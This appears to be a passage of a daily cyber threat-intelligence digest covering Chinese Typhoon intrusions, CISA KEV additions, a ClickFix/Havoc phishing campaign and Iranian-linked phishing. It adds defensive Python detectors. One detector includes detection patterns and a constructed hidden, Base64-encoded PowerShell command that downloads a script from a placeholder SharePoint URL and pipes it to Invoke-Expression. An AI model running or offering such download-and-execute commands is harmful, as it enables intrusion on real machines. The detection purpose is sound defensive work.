Wednesday, Mar 05, 2025 // (IG): BB // GITHUB // SN R&D
Typhoon Cyber Attacks Highlight China’s Growing Cyber Capabilities and Strategic Intent
Bottom Line Up Front (BLUF): China-backed cyber threat groups, including Salt Typhoon and Volt Typhoon, continue to embed themselves in critical infrastructure networks, raising alarms about long-term sabotage potential. These advanced cyber operations target telecommunications, government, and civilian infrastructure, with implications for national security in the U.S., Australia, and allied nations. Australia’s intelligence agencies warn that cyber sabotage risks are increasing, reinforcing the need for greater defensive and offensive cyber capabilities.
Analyst Comments: The growing sophistication of Chinese cyber operations signals a shift from mere intelligence gathering to long-term strategic pre-positioning within critical systems. The ability of Volt Typhoon to persist within networks without deploying traditional malware makes detection and remediation particularly challenging. These intrusions are not just acts of espionage; they serve as a foundation for potential coercion or cyber warfare. Australia, as a key U.S. ally in the Indo-Pacific, must take proactive steps to strengthen its cyber defenses, limit technological dependence on China, and impose costs on cyber adversaries. Complacency in addressing this threat could leave critical systems vulnerable at a moment of geopolitical crisis.
FROM THE MEDIA: These state-backed actors have infiltrated U.S. telecommunications networks, enabling mass surveillance, phone call interception, and intelligence collection. Volt Typhoon has also embedded itself within critical infrastructure networks, using "living-off-the-land" techniques that make detection difficult. Some U.S. officials fear that China has gained persistent access to key systems, making it nearly impossible to ensure full removal of these intrusions. In Australia, intelligence leaders warn that cyber sabotage risks are escalating, with adversaries pre-positioning for potential future disruptions. The Australian Signals Directorate has ramped up cybersecurity efforts, assisting organizations in detecting stealthy intrusions and enhancing offensive cyber capabilities. As tensions rise in the Indo-Pacific, experts stress the urgent need to counter China’s growing cyber dominance and reduce reliance on Chinese technology.
READ THE STORY: ASPI
Trump Seeks to Eliminate $52.7 Billion CHIPS Act, Citing Wasteful Spending
Bottom Line Up Front (BLUF): President Donald Trump has called for the repeal of the $52.7 billion CHIPS and Science Act, a bipartisan law passed in 2022 to boost U.S. semiconductor manufacturing. Trump argued that the subsidies were ineffective and suggested reallocating any remaining funds toward reducing the national debt. The move comes amid a broader review of government spending. It has raised concerns from officials who say the law has driven significant investments from chipmakers like Intel, Samsung, and Taiwan Semiconductor Manufacturing Co. (TSMC).
Analyst Comments: Scrapping the CHIPS Act would represent a significant reversal in U.S. industrial policy, potentially undermining efforts to reduce dependence on foreign-made semiconductors. The law has already secured commitments from global chipmakers to expand U.S. production, including TSMC’s recently announced $100 billion investment in additional chip facilities. If Trump eliminates the subsidies, it could create uncertainty for ongoing projects and weaken America’s long-term semiconductor supply chain resilience. Additionally, reversing grant agreements signed under the Biden administration could trigger legal disputes with companies already receiving funding.
FROM THE MEDIA: Trump criticized the CHIPS Act in a speech to Congress, calling it a "horrible" law that failed to deliver meaningful results. Under the Biden administration, the Commerce Department awarded over $33 billion in subsidies to major semiconductor firms, with Intel receiving up to $7.86 billion, TSMC $6.6 billion, Samsung $4.75 billion, and Micron $6.1 billion. New York Governor Kathy Hochul defended the law, highlighting its role in bringing a $100 billion Micron facility and 50,000 jobs to the state. Meanwhile, sources revealed that about one-third of staff overseeing chip subsidies at the U.S. Commerce Department were recently laid off, indicating a shift in policy under the Trump administration.
READ THE STORY: Reuters
CISA Warns of Active Exploitation of Cisco, Microsoft, Hitachi, and Progress Vulnerabilities
Bottom Line Up Front (BLUF): The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added five security vulnerabilities affecting Cisco, Hitachi Vantara, Microsoft Windows, and Progress WhatsUp Gold to its Known Exploited Vulnerabilities (KEV) catalog. These flaws, ranging from command injection to privilege escalation vulnerabilities, are actively exploited in the wild. Federal agencies have been mandated to apply necessary mitigations by March 24, 2025, to protect their networks from potential cyberattacks.
Analyst Comments: The additions range from a Windows flaw first patched in 2018 (CVE-2018-8639) to a 2024 WhatsUp Gold bug, a reminder that attackers exploit old and new vulnerabilities alike. CVE-2023-20118 in Cisco Small Business RV routers is being used to recruit devices into a botnet, while CVE-2018-8639 continues to be leveraged by Chinese threat actors for privilege escalation. The affected Cisco RV routers have reached end of life, so for them remediation means replacement, or at minimum taking the web management interface off the internet; attackers deliberately favor such EOL devices and unpatched enterprise software. The March 24 deadline formally binds federal civilian agencies under BOD 22-01, but it is a sensible benchmark for everyone else. Organizations should remediate in KEV due-date order and segment networks so a compromised edge device or management server cannot reach core systems.
FROM THE MEDIA: The five flaws are being leveraged by both cybercriminals and nation-state actors. CVE-2023-20118, a command injection bug in the web management interface of Cisco Small Business RV Series routers, is being used to recruit devices into the PolarEdge botnet, while CVE-2018-8639, a Windows privilege escalation flaw, is exploited by the Chinese hacking group Dalbit (m00nlight). Two Hitachi Vantara Pentaho BA Server vulnerabilities (CVE-2022-43939, an authorization bypass, and CVE-2022-43769, which allows arbitrary command execution) complete the list together with CVE-2024-4885 in Progress WhatsUp Gold, which enables unauthenticated remote code execution; exploitation attempts against the WhatsUp Gold flaw have been observed from Hong Kong, Russia, Brazil, South Korea, and the UK. With attackers increasingly targeting end-of-life (EOL) devices and unpatched enterprise software, organizations should prioritize patching, network segmentation, and proactive monitoring.
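The practical question a KEV addition raises is "which of my assets does this touch, and how many days do I have?" The script below is an added example for this digest, not CISA tooling. It mirrors the field names of CISA's public KEV JSON feed, but the feed sample is constructed: the five CVE IDs and the March 24, 2025 due date come from the story above, while the dateAdded values, one-line descriptions, ransomware flags, hostnames and inventory are assumed for illustration. It also encodes the EOL caveat from the analyst comments: an end-of-life device gets "replace/isolate" rather than "patch".

```python
"""Triage KEV entries against a local asset inventory (added example, not CISA code).

The feed sample uses the field names of CISA's KEV JSON (vulnerabilities[].cveID,
vendorProject, product, dateAdded, dueDate, requiredAction,
knownRansomwareCampaignUse) but is CONSTRUCTED: only the CVE IDs and the
2025-03-24 due date come from the story; everything else is assumed.
"""
import json
from datetime import date

_ACTION = "Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable."

KEV_SAMPLE = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2023-20118", "vendorProject": "Cisco",
     "product": "Small Business RV Series Routers",
     "vulnerabilityName": "command injection (PolarEdge botnet recruitment)",
     "dateAdded": "2025-03-03", "dueDate": "2025-03-24",
     "requiredAction": _ACTION, "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2022-43939", "vendorProject": "Hitachi Vantara",
     "product": "Pentaho BA Server", "vulnerabilityName": "authorization bypass",
     "dateAdded": "2025-03-03", "dueDate": "2025-03-24",
     "requiredAction": _ACTION, "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2022-43769", "vendorProject": "Hitachi Vantara",
     "product": "Pentaho BA Server", "vulnerabilityName": "arbitrary command execution",
     "dateAdded": "2025-03-03", "dueDate": "2025-03-24",
     "requiredAction": _ACTION, "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2018-8639", "vendorProject": "Microsoft", "product": "Windows",
     "vulnerabilityName": "privilege escalation",
     "dateAdded": "2025-03-03", "dueDate": "2025-03-24",
     "requiredAction": _ACTION, "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-2024-4885", "vendorProject": "Progress", "product": "WhatsUp Gold",
     "vulnerabilityName": "unauthenticated remote code execution",
     "dateAdded": "2025-03-03", "dueDate": "2025-03-24",
     "requiredAction": _ACTION, "knownRansomwareCampaignUse": "Unknown"},
]})

# Constructed inventory. "eol" marks hardware the vendor no longer patches.
INVENTORY = [
    {"hostname": "edge-rtr-01", "vendor": "Cisco", "product": "Small Business RV Series Routers", "eol": True},
    {"hostname": "bi-01", "vendor": "Hitachi Vantara", "product": "Pentaho BA Server", "eol": False},
    {"hostname": "dc-01", "vendor": "Microsoft", "product": "Windows", "eol": False},
    {"hostname": "npm-01", "vendor": "Progress", "product": "WhatsUp Gold", "eol": False},
]


def parse_kev(raw: str) -> list:
    """Return the vulnerability records of a KEV JSON document."""
    return json.loads(raw)["vulnerabilities"]


def triage(kev_entries: list, inventory: list, today: date) -> list:
    """Join KEV records to inventory on vendor/product and rank by urgency."""
    hits = []
    for asset in inventory:
        for v in kev_entries:
            if (asset["vendor"].lower() != v["vendorProject"].lower()
                    or asset["product"].lower() != v["product"].lower()):
                continue
            due = date.fromisoformat(v["dueDate"])
            hits.append({
                "hostname": asset["hostname"],
                "cveID": v["cveID"],
                "dueDate": v["dueDate"],
                "days_left": (due - today).days,
                "overdue": due < today,
                # An EOL device cannot be patched; the "discontinue use" clause of
                # the required action is the only real remediation for it.
                "action": "replace/isolate" if asset.get("eol") else "patch",
                "ransomware": v.get("knownRansomwareCampaignUse") == "Known",
            })
    # Most urgent first: overdue, then ransomware-linked, then soonest due date.
    hits.sort(key=lambda h: (not h["overdue"], not h["ransomware"], h["days_left"]))
    return hits


if __name__ == "__main__":
    for h in triage(parse_kev(KEV_SAMPLE), INVENTORY, date(2025, 3, 5)):
        print(f'{h["hostname"]:<12} {h["cveID"]:<16} due {h["dueDate"]} '
              f'({h["days_left"]:>3}d) -> {h["action"]}')
```

In production the sample string is replaced by the downloaded feed and the inventory by an export from the CMDB or vulnerability scanner; the join key is the weak point, so normalise vendor and product names on both sides before relying on the result.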
READ THE STORY: THN
CK Hutchison Sells Panama Canal Stake to BlackRock, Shares Surge 22%
Bottom Line Up Front (BLUF): CK Hutchison has sold a majority stake in its $22.8 billion port unit, including 90% of Panama Ports Company, to a BlackRock-led consortium. The deal grants U.S. firms significant control over key Panama Canal docks amid rising U.S.-China geopolitical tensions. CK Hutchison's stock soared 22% following the announcement, with JPMorgan calling the sale "surprising" and "opportunistic."
Analyst Comments: This deal marks a strategic shift in port ownership, transferring crucial infrastructure from a Hong Kong-based conglomerate to U.S. interests. While CK Hutchison insists the sale is purely commercial, the move aligns with Washington’s push to reduce Chinese influence over global supply chains. The Panama Canal’s importance to U.S. trade makes this acquisition geopolitically significant, especially as U.S.-China rivalry intensifies. The sale also raises questions about CK Hutchison's future strategy: ports will now contribute about 1% of its earnings, down from 15%.
FROM THE MEDIA: CK Hutchison announced the sale of its 80% stake in Hutchison Ports, a $22.8 billion business unit, to a consortium led by BlackRock, Terminal Investment, and Global Infrastructure Partners. This transaction includes a 90% stake in Panama Ports Company, which has operated key terminals along the Panama Canal for over two decades. The sale follows a recent ruling by Panama's attorney general that deemed Hutchison's port contract "unconstitutional," with the Supreme Court set to issue a final decision. The U.S. has advocated for reducing Chinese control over strategic infrastructure, making this sale particularly timely. JPMorgan analysts noted that while selling the Panama operations makes sense, the deal was unexpected and could signal a broader shift in CK Hutchison’s business focus.
READ THE STORY: Reuters // WSJ
Eutelsat in Talks to Expand Satellite Services in Ukraine Amid Starlink Uncertainty
Bottom Line Up Front (BLUF): Eutelsat, the French satellite operator and owner of OneWeb, is discussing enhancing satellite connectivity in Ukraine with European governments. The move comes as concerns grow over Ukraine’s reliance on Elon Musk’s Starlink, notably after reports suggested U.S. officials may restrict access. Eutelsat’s stock surged up to 123% following the announcement, as investors speculate that European leaders are seeking alternatives to Starlink for military and government communications.
Analyst Comments: The discussions signal Europe’s strategic push to reduce dependence on U.S.-controlled technology, particularly as political uncertainty surrounds Starlink's availability in Ukraine. While OneWeb's satellite network is smaller and older than Starlink's, it offers European governments greater control over critical communications infrastructure. This shift aligns with broader European efforts to boost self-reliance in defense and technology, especially as the EU considers a €150 billion loan package for military procurement. However, OneWeb’s technological limitations, such as higher latency and less portable user terminals than Starlink's, could pose operational challenges for Ukrainian forces.
FROM THE MEDIA: Eutelsat confirmed its ongoing collaboration with European institutions and business partners to provide satellite services that support critical missions and infrastructure in Ukraine. The company is exploring the use of its OneWeb low-Earth orbit (LEO) satellites (1,200 km altitude) and geostationary (GEO) satellites (35,000 km altitude) to ensure reliable connectivity, particularly for military drone operations. The European Commission is also considering integrating Ukraine into its GovSatCom program, which aims to pool the satellite capabilities of EU member states into a secure network. However, this initiative may take years to become fully operational.
READ THE STORY: FT
Hackers Exploit ClickFix Trick to Deploy Havoc C2 via SharePoint
Bottom Line Up Front (BLUF): A new phishing campaign uses the ClickFix trick to deliver the Havoc command-and-control (C2) framework via SharePoint. Attackers leverage phishing emails containing an HTML file that tricks users into executing a malicious PowerShell command. This triggers a multi-stage infection process that ultimately deploys the Havoc Demon malware, a C2 agent used for data exfiltration and system control. Fortinet FortiGuard Labs warns that the campaign exploits Microsoft Graph API to disguise C2 communications within legitimate services.
Analyst Comments: ClickFix is effective because it makes the user the execution engine: the victim copies and runs the command themselves, so no software exploit is needed and mail or browser sandboxing never sees a payload. Havoc is an open-source post-exploitation framework built for red teams; its use here fits the wider trend of attackers adopting public tooling, which also muddies attribution. Routing C2 through Microsoft Graph API sends the traffic to legitimate Microsoft endpoints over TLS, so network blocklists offer little help. Organizations should reinforce phishing awareness training, restrict or audit PowerShell for standard users, and deploy endpoint detection capable of identifying anomalous PowerShell activity, in particular hidden-window, encoded, or download-and-execute command lines launched from explorer.exe.
FROM THE MEDIA: According to Fortinet, the attack begins with a phishing email containing an HTML attachment ("Documents.html") that claims a Microsoft OneDrive error requires manual DNS cache updates. If the victim follows the instructions, they execute a PowerShell script hosted on a SharePoint server. The script then downloads a Python interpreter and additional payloads, including KaynLdr, a reflective loader that launches the Havoc Demon agent. The malware can gather system information, manipulate authentication tokens, and execute additional payloads while masking its C2 traffic through Microsoft Graph API. Fortinet warns that this technique allows threat actors to blend malicious activity with legitimate network traffic, making detection more difficult.
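The chain described above leaves a distinctive process-creation footprint: PowerShell spawned by the user's shell, hidden window, remote fetch from a SharePoint URL piped into Invoke-Expression. The detector below is an added example for this digest, not Fortinet's detection content. It scores Sysmon-style events (Image, ParentImage, CommandLine fields) against those traits and decodes -EncodedCommand before scoring so that Base64 does not hide them. The two sample events, the tenant name, the SharePoint URL and the "fixdns" script are constructed placeholders, not indicators from the campaign; the weights and the threshold of 5 are tuning assumptions.

```python
"""Score process-creation events for ClickFix-style PowerShell (added example).

Events are CONSTRUCTED Sysmon-like records; URLs and names are placeholders,
not campaign IOCs. Weights and THRESHOLD are assumptions to tune locally.
"""
import base64
import re

# (regex, weight, reason) applied to the command line plus its decoded form.
INDICATORS = [
    (r"-w(?:indowstyle)?\s+h(?:idden)?\b", 2, "hidden window"),
    (r"-nop\b|-noprofile\b", 1, "no profile"),
    (r"-e(?:xecutionpolicy|p)\s+bypass", 1, "execution policy bypass"),
    (r"\biex\b|invoke-expression", 2, "Invoke-Expression of fetched content"),
    (r"\birm\b|\biwr\b|invoke-restmethod|invoke-webrequest|downloadstring", 2, "remote download cmdlet"),
    (r"https?://\S+", 1, "URL in command line"),
    (r"https?://[a-z0-9.-]*sharepoint\.com/", 2, "script staged on SharePoint"),
]
# -e / -ec / -enc / -encodedcommand followed by a Base64 blob.
ENCODED = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
# Parents that mean "a human ran this", e.g. the Win+R Run dialog under explorer.exe.
USER_PARENTS = {"explorer.exe", "winword.exe", "outlook.exe", "msedge.exe", "chrome.exe"}
THRESHOLD = 5


def decode_encoded_command(cmd: str) -> str:
    """Return the UTF-16LE script behind -EncodedCommand, or '' if none/invalid."""
    m = ENCODED.search(cmd)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:
        return ""


def score_event(event: dict) -> dict:
    """Weight ClickFix traits in one process-creation event."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    result = {"score": 0, "reasons": [], "decoded": "", "flagged": False}
    if image not in {"powershell.exe", "pwsh.exe"}:
        return result
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent in USER_PARENTS:
        result["score"] += 2
        result["reasons"].append(f"launched from {parent} (Run dialog / pasted command)")
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    if decoded:
        result["score"] += 1
        result["reasons"].append("encoded command")
        result["decoded"] = decoded
    text = cmd + "\n" + decoded          # scan the visible and the decoded text together
    for pattern, weight, reason in INDICATORS:
        if re.search(pattern, text, re.I):
            result["score"] += weight
            result["reasons"].append(reason)
    result["flagged"] = result["score"] >= THRESHOLD
    return result


def scan(events: list) -> list:
    return [score_event(e) for e in events]


# Constructed samples. The first mimics a pasted "fix": hidden PowerShell pulling a
# script from a SharePoint URL into iex, wrapped in -enc; the second is a benign
# scheduled inventory script.
FIX_SCRIPT = ("irm https://contoso-my.sharepoint.com/personal/it_contoso_com/"
              "_layouts/15/download.aspx?share=fixdns | iex")
ENCODED_SCRIPT = base64.b64encode(FIX_SCRIPT.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": f"powershell -w hidden -nop -ep bypass -enc {ENCODED_SCRIPT}"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\\Scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for ev, r in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(("ALERT " if r["flagged"] else "ok    ") + f'score={r["score"]:<3} {", ".join(r["reasons"])}')
```

Scoring rather than a single regex keeps the rule useful when the lure changes: a campaign that swaps SharePoint for another trusted host or drops -enc still trips the hidden-window, user-parent and download-then-iex traits.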
READ THE STORY: THN
U.S. Sanctions Iranian National Behind Defunct Nemesis Darknet Marketplace
Bottom Line Up Front (BLUF): The U.S. Treasury Department has sanctioned Iranian national Behrouz Parsarad, accusing him of operating the now-defunct Nemesis darknet marketplace and facilitating the sale of illicit drugs, cybercrime tools, and fake documents. Nemesis, which was taken down in March 2024, reportedly handled nearly $30 million in drug sales, including fentanyl trafficking. Authorities say Parsarad has attempted to rebuild a similar marketplace since its takedown. The sanctions also include 49 cryptocurrency wallets linked to his illicit activities.
Analyst Comments: By targeting Parsarad’s financial networks, including cryptocurrency laundering, the Treasury aims to disrupt future illicit operations. However, history has shown that when one darknet marketplace is shut down, others quickly emerge to fill the void. The focus on fentanyl-related transactions also aligns with the U.S. government’s broader efforts to combat the opioid crisis. Given Parsarad’s continued attempts to re-establish a marketplace, further law enforcement action against successor platforms is likely.
FROM THE MEDIA: The Nemesis marketplace, founded in 2021, attracted over 150,000 users before it was dismantled in a joint law enforcement operation involving Germany, the U.S., and Lithuania. Nearly 20% of its estimated 1,100 sellers were based in Germany, according to the German Federal Police (BKA). The site offered a range of illegal goods, including ransomware services, phishing kits, and DDoS-for-hire attacks. Parsarad, who controlled Nemesis and its cryptocurrency wallets, reportedly profited significantly from transaction fees and laundering services. The U.S. Treasury’s Office of Foreign Assets Control (OFAC) issued the sanctions in coordination with the FBI-led Joint Criminal Opioid and Darknet Enforcement Team, part of a broader effort to dismantle similar platforms.
READ THE STORY: The Record
Trump Administration Halts U.S. Cyber Command Operations Against Russia
Bottom Line Up Front (BLUF): The Trump administration has reportedly ordered U.S. Cyber Command to pause offensive cyber operations against Russia, marking a significant shift in U.S. cybersecurity strategy. This decision is part of a broader effort to reset relations with Moscow, including easing sanctions and repatriating Russian cybercriminals in prisoner swaps. Security experts warn that this move could weaken U.S. cyber defenses and allow Russia to strengthen its networks and escalate cyber activities.
Analyst Comments: Pausing offensive cyber operations against Russia could have significant long-term consequences. For years, Cyber Command has played a key role in disrupting Russian cyber threats, including ransomware groups, election interference, and attacks on U.S. infrastructure. A temporary halt could allow Russian operatives to reconfigure their networks and adopt new tactics, making future U.S. cyber efforts less effective. While the Trump administration appears to be shifting focus to China as the primary cyber threat, sidelining Russia may embolden its state-backed hackers and criminal groups to act with less resistance. This policy change could also strain relations with U.S. allies who view Russia as a cybersecurity adversary.
FROM THE MEDIA: Reports indicate that the Trump administration has instructed U.S. Cyber Command to suspend offensive cyber operations targeting Russia, signaling a dramatic foreign policy shift. The decision aligns with broader diplomatic efforts to improve ties with Moscow, including potential sanctions relief and prisoner swaps involving Russian cybercriminals. The Kremlin has welcomed these actions, stating that U.S. policy is now more in line with Russian interests. Experts warn that this pause could set back months of cyber planning, as offensive operations require extensive intelligence gathering. Additionally, adversaries from other nations could take advantage of the gap, masking their own activities behind Russian cyber tactics. While the Cybersecurity and Infrastructure Security Agency (CISA) insists that Russian cyber threats remain a priority, this shift in strategy could have far-reaching security implications.
READ THE STORY: Axios
Iranian-Linked Hackers Exploit Indian Firm to Target UAE Aviation Sector
Bottom Line Up Front (BLUF): A suspected Iranian-aligned hacking group, UNK_CraftyCamel, leveraged a compromised Indian electronics company's email to launch a highly targeted phishing attack against aviation and satellite communications organizations in the United Arab Emirates (UAE). The attack used malicious ZIP files with polyglot payloads to deliver a new Golang-based backdoor, Sosano, allowing attackers to establish remote access to compromised systems.
Analyst Comments: By sending the lure from a compromised, trusted business partner, UNK_CraftyCamel got past sender-reputation and domain-based phishing defenses, and the targets had every reason to open the attachment. Go-based malware such as Sosano is slower to triage because the binaries are large, statically linked, and padded with runtime and library code that buries the actor's own logic; it is a tooling choice seen across many actors rather than a uniquely Iranian signature. Targeting aviation and satellite communications aligns with Iranian intelligence priorities, as both sectors underpin the UAE's national security and economy. The polyglot files (single files that parse validly as more than one format) are cheap to build but defeat scanners that trust a file's extension or parse it as only one type; together with the shortcut masquerading as a spreadsheet, the chain points to deliberate, targeted tradecraft rather than commodity phishing.
FROM THE MEDIA: The emails linked to malicious ZIP files hosted on a lookalike domain (indicelectronics[.]net), tricking victims into downloading and opening them. Each ZIP held a Windows shortcut (LNK) named with a double extension so that it appeared to be an Excel (XLS) spreadsheet, plus two PDFs that were polyglot files carrying hidden payloads. When the victim ran the LNK, it launched a malicious HTA script, which extracted a DLL backdoor hidden in an image file using XOR decoding and executed it. The Sosano backdoor then connected to its command-and-control (C2) server and awaited instructions. Sosano's function set is small but sufficient: browse directories, execute commands, download additional payloads, and delete files. Researchers found no clear overlaps with known threat groups but suspect links to Iran’s Islamic Revolutionary Guard Corps (IRGC) based on tactics and target selection.
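Two of the evasions above are easy to check for at the mail gateway or in a sandbox: a member whose declared extension does not match its magic bytes (or whose double extension ends in an executable type), and a PDF that also contains HTML/script or a ZIP local-file header. The third stage, a PE hidden in an image with a single-byte XOR, can be recovered by known-plaintext search for the MZ header. The script below is an added example for this digest, not Proofpoint's or the actor's code. Every input is constructed: the member names, the truncated LNK/PDF/JPEG headers, the placeholder script and the 0x5A key are illustrative and are not indicators from the UNK_CraftyCamel campaign.

```python
"""Flag masqueraded and polyglot ZIP members; carve a single-byte-XOR'd PE from an
image by known-plaintext search. Added example; all samples are CONSTRUCTED."""
import io
import zipfile

MAGIC = {  # leading bytes -> content type (order matters only for overlaps)
    b"%PDF": "pdf",
    b"PK\x03\x04": "zip",
    b"\xd0\xcf\x11\xe0": "ole2",                       # legacy .xls/.doc container
    b"L\x00\x00\x00\x01\x14\x02\x00": "lnk",           # Shell Link header + CLSID prefix
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG": "png",
    b"MZ": "pe",
}
EXT_TYPE = {"pdf": "pdf", "zip": "zip", "xls": "ole2", "doc": "ole2", "lnk": "lnk",
            "jpg": "jpeg", "jpeg": "jpeg", "png": "png", "dll": "pe", "exe": "pe"}
EXEC_EXT = {"lnk", "hta", "js", "vbs", "exe", "scr", "cmd", "bat", "ps1"}
# Byte sequences that have no business inside a plain PDF body.
POLYGLOT_MARKERS = {b"<html": "pdf/html", b"<script": "pdf/script", b"PK\x03\x04": "pdf/zip"}


def sniff(data: bytes) -> str:
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def scan_member(name: str, data: bytes) -> list:
    """Return human-readable findings for one archive member."""
    findings = []
    exts = name.lower().rsplit("/", 1)[-1].split(".")[1:]
    final = exts[-1] if exts else ""
    kind = sniff(data)
    if len(exts) >= 2 and final in EXEC_EXT:
        findings.append(f"{name}: double extension hides executable type .{final}")
    expected = EXT_TYPE.get(final)
    if expected and kind not in (expected, "unknown"):
        findings.append(f"{name}: extension .{final} but content is {kind}")
    if kind == "pdf":
        for marker, label in POLYGLOT_MARKERS.items():
            if marker in data:
                findings.append(f"{name}: {label} polyglot ({marker!r} inside PDF)")
    return findings


def scan_zip(zip_bytes: bytes) -> list:
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            findings.extend(scan_member(info.filename, zf.read(info)))
    return findings


def carve_xor_pe(blob: bytes, known: bytes = b"MZ\x90\x00"):
    """Return (key, offset) where a single-byte XOR of `known` starts, else None.
    The first byte fixes the only candidate key; the rest verify it."""
    n = len(known)
    for off in range(len(blob) - n + 1):
        key = blob[off] ^ known[0]
        if all(blob[off + i] ^ key == known[i] for i in range(1, n)):
            return key, off
    return None


# ---- constructed samples -------------------------------------------------
def build_sample_zip() -> bytes:
    lnk = b"L\x00\x00\x00\x01\x14\x02\x00" + b"\x00" * 24            # truncated LNK header
    pdf_hta = (b"%PDF-1.7\n%constructed polyglot\n<html><script language=\"VBScript\">"
               b"' payload placeholder</script></html>\n%%EOF\n")
    pdf_zip = b"%PDF-1.7\n%constructed polyglot\n" + b"PK\x03\x04" + b"\x00" * 26 + b"\n%%EOF\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_Q1.xls.lnk", lnk)   # shortcut posing as a spreadsheet
        zf.writestr("Terms.pdf", pdf_hta)        # PDF that is also an HTA
        zf.writestr("Brochure.pdf", pdf_zip)     # PDF that is also a ZIP
    return buf.getvalue()


XOR_KEY = 0x5A  # assumed key for the sample only


def build_sample_image() -> bytes:
    fake_dll = b"MZ\x90\x00" + b"\x03\x00\x00\x00\x04\x00\x00\x00" + b"\x00" * 48 + b"PE\x00\x00"
    encoded = bytes(b ^ XOR_KEY for b in fake_dll)
    return b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 22 + encoded  # payload at offset 33


if __name__ == "__main__":
    for f in scan_zip(build_sample_zip()):
        print("FINDING:", f)
    print("xor pe:", carve_xor_pe(build_sample_image()))
```

Extension-versus-magic mismatches produce some noise on legitimate archives (renamed exports, odd templates), so in practice the double-extension and polyglot findings are the high-confidence ones and the mismatch is a supporting signal. For multi-byte XOR keys the same known-plaintext idea works with the header bytes spread over the key length.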
READ THE STORY: THN
Taiwan Looks to Ukraine for Contingency Planning Amid Rising Chinese Threats
Bottom Line Up Front (BLUF): Taiwan is studying how Ukrainian businesses have maintained operations during wartime to bolster its contingency planning in the face of increasing Chinese military pressure. A senior Taiwan security official revealed that the government is working to integrate private companies into national resilience strategies, drawing lessons from Ukraine’s use of supermarkets for supply distribution and taxi services for medical emergencies. A recent closed-door workshop in Taipei included security officials and diplomats from the U.S., Japan, and Australia.
Analyst Comments: While Taiwan has long focused on military readiness, this initiative suggests a shift toward whole-of-society resilience involving critical infrastructure, cybersecurity, and private-sector cooperation. The emphasis on digital infrastructure security, particularly in response to potential cyberattacks, mirrors Ukraine’s experience of sustained Russian cyber operations. By fostering stronger ties with Ukrainian companies and international allies, Taiwan is signaling its determination to prepare for both conventional and asymmetric threats China poses.
FROM THE MEDIA: A senior Taiwan official told Reuters that Taipei is actively working with Ukrainian businesses to enhance contingency planning, citing companies like Uber and Microsoft that continued operations during the war. The government is particularly interested in strategies for maintaining food supply chains, emergency transportation, and financial services. Security experts at a recent workshop stressed the importance of cloud-based systems, pointing to Russian cyberattacks on Ukraine’s infrastructure as a key lesson. Taiwan is also revamping its air-raid alert and shelter systems, incorporating insights from Northern Europe and the Baltic states. These efforts come as China continues to ramp up military drills and economic pressure against Taiwan, which Beijing claims as its territory.
READ THE STORY: Reuters
Chinese Cyber Espionage Expands Across Industries, Driven by Geopolitical Ambitions
Bottom Line Up Front (BLUF): Chinese state-backed cyber espionage has escalated across multiple industries, with CrowdStrike reporting a 150% rise in intrusions globally in 2024. Seven new China-linked threat groups were identified, targeting not only government and technology sectors but also finance, media, and manufacturing. The expansion aligns with China's long-term geopolitical ambitions, particularly regarding Taiwan. Chinese groups have also refined their tactics, sharing malware tools and exploiting vulnerabilities in cloud environments and internet-facing infrastructure.
Analyst Comments: The diversification of targets suggests a strategic shift toward broader economic and geopolitical objectives. The use of shared malware, such as KEYPLUG and PlugX, and resilient operational relay networks complicates attribution and mitigation efforts. Organizations should prioritize identity security, patching internet-exposed systems, and monitoring for subtle indicators of compromise, as China-backed groups quickly adapt to new defensive measures. The growing focus on Taiwan suggests that cyber operations could play a key role in future geopolitical conflicts.
FROM THE MEDIA: According to CrowdStrike’s 2025 Global Threat Report, China-backed cyber intrusions surged by 150% in 2024, with some industries experiencing a 200-300% increase in attacks. Traditionally, Chinese hackers focused on government, telecom, and technology sectors, but attacks against financial services, media, and manufacturing saw the most significant growth. Newly identified groups such as Liminal Panda, Locksmith Panda, and Operator Panda have specialized in breaching telecom networks. Vault Panda and Envoy Panda continue to target government and diplomatic entities. The attackers rely on shared malware, including KEYPLUG and PlugX, and maintain sophisticated relay networks to obfuscate operations. CrowdStrike attributes the rise in activity to China's strategic investment in cyber capabilities, which includes training elite hackers and developing advanced cyber tools. The report warns that these operations align with China’s broader regional ambitions, including its objective of reunifying with Taiwan.
READ THE STORY: CSO
Black Basta Affiliates Suspected in CACTUS Ransomware Operations
Bottom Line Up Front (BLUF): Researchers have identified strong links between the CACTUS and Black Basta ransomware operations, indicating that former Black Basta affiliates may have transitioned to CACTUS. Both ransomware groups have been found using the same BackConnect (BC) module, known as QBACKCONNECT, to maintain persistent access to compromised systems. The overlap in tactics, techniques, and procedures (TTPs) highlights an evolving ransomware landscape, where actors adapt to law enforcement actions by rebranding and refining their operations.
